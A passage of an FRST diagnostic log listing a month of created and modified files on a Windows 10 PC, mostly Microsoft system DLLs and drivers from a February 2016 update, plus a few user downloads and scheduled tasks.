2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-09 19:47 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-03-09 18:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 19:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 19:39 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-09 19:34 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-09 19:34 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 19:34 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
